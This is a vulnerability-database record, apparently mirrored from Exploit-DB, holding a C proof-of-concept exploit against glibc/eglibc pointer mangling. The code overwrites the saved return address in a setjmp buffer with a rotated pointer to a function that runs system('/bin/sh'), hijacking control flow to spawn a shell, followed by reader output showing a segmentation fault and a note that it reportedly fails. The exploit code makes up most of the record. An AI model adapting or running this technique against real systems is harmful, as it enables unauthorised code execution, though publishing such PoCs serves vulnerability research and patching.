{"href": "https://www.seebug.org/vuldb/ssvid-82213", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "glibc and eglibc 2.5, 2.7, 2.13 - Buffer Overflow Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82213", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n /*\r\n * \r\n * Exploit-DB Note: Reportedly does not work. See output at the bottom of the entry.\r\n *\r\n * $FILE: bug-mangle.c\r\n *\r\n * Comment: Proof of concept\r\n *\r\n * $VERSION$\r\n *\r\n * Author: Hector Marco <hecmargi@upv.es>\r\n * Ismael Ripoll <iripoll@disca.upv.es>\r\n *\r\n * $LICENSE: \r\n * This program is free software; you can redistribute it and/or modify\r\n * it under the terms of the GNU General Public License as published by\r\n * the Free Software Foundation; either version 2 of the License, or\r\n * (at your option) any later version.\r\n *\r\n * This program is distributed in the hope that it will be useful,\r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n * GNU General Public License for more details.\r\n *\r\n * You should have received a copy of the GNU General Public License\r\n * along with this program; if not, write to the Free Software\r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <setjmp.h>\r\n#include <stdint.h>\r\n#include <limits.h>\r\n\r\n#ifdef __i386__\r\n #define ROTATE 0x9\r\n #define PC_ENV_OFFSET 0x14\r\n#elif __x86_64__\r\n #define ROTATE 0x11\r\n #define PC_ENV_OFFSET 0x38\r\n#else\r\n #error The exploit does not support this architecture\r\n#endif\r\n\r\nunsigned long rol(uintptr_t value) {\r\n return (value << ROTATE) | (value >> (__WORDSIZE - ROTATE));\r\n}\r\n\r\nint hacked(){\r\n printf("[+] hacked !!\\n");\r\n system("/bin/sh");\r\n}\r\n\r\nint main(void){\r\n jmp_buf env;\r\n uintptr_t *ptr_ret_env = (uintptr_t*) (((uintptr_t) env) + PC_ENV_OFFSET);\r\n\r\n printf("[+] Exploiting ...\\n");\r\n if(setjmp(env) == 1){\r\n printf("[-] Exploit failed.\\n");\r\n return 0;\r\n }\r\n\r\n /*Overwrie env return address */\r\n *ptr_ret_env = rol((uintptr_t)hacked);\r\n\r\n longjmp(env, 1);\r\n\r\n printf("[-] Exploit failed.\\n");\r\n return 0;\r\n}\r\n\r\n####################################################################################################################\r\n#\r\n# Reader submitted results\r\n/*\r\n\r\n[522] user@his-system ~ $ ./POC\r\n[+] Exploiting ...\r\nSegmentation fault\r\n[523] user@his-system ~ $ ldd POC\r\nlinux-vdso.so.1 => (0x00007fffab5fd000)\r\nlibc.so.6 => /lib64/libc.so.6 (0x0000003269800000)\r\n/lib64/ld-linux-x86-64.so.2 (0x0000003269400000)\r\n[525] user@his-system ~ $ uname -a\r\nLinux his-sysrtem.domain.LOCAL 2.6.18-348.12.1.el5xen #1 SMP Mon Jul 1 17:58:32 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux\r\n[526] user@his-system ~ $\r\n\r\n[526] user@his-system ~ $ grep vsys /proc/self/maps\r\nffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vsyscall]\r\nffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vsyscall]\r\n\r\n*/\n ", "id": "SSV:82213", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:11:13", "reporter": "Root", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T14:11:13", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:11:13", "rev": 2}, "vulnersScore": 0.2}, "references": []}

{}